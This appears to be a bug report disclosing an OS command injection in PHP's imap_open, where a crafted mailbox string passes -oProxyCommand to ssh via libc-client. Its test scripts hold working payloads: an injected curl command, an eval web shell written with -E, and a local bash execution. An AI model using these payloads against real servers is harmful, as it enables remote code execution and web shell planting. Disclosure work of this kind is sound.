Description:
------------
Hello.

Some PHP CMS/CRM's uses IMAP package in it's features. I was encountered with such functionality in my research and found ability to execute OS commands through imap_open function. Which can be exploitable remotely or locally to bypass disabled_functions and open_basedir.

The test was conducted on fresh "Debian 9" with "PHP 7.0.27", but most likely it's not important, because I think there are some problems in "libc-client" and this may affects other distros.

For some reasons "libc-client" uses "/usr/bin/rsh" for check(?) connection to a given hostname and adds additional arguments, if a space char is presents in the giving mailbox. Then all argument goes to "execve" call.

In debian based distros "rsh" is a link to "ssh", so "-oProxyCommand" option can be used for command execution and "-E" for file write.

Test script:
---------------
Remote:
<?php
//File write:
//<?=eval('eval('.strtoupper('$_REQUEST').'["x"]);');?> -E shell.php}
//
//RCE:
//server=x -oProxyCommand="`curl$IFS''localhost?PWN`"}&login=1&password=1

imap_open('{'.$_POST['server'].':993/imap/ssl}INBOX', $_POST['login'], $_POST['password']);
?>

Local:

<?php
file_put_contents('x','touch /tmp/PWN');
chmod('x', 0755);
imap_open('{x -oProxyCommand="`bash$IFS\'\'x`"}', 0, 0);
unlink('x');
?>

Expected result:
----------------
Connection error

Actual result:
--------------
Unexpected OS command execution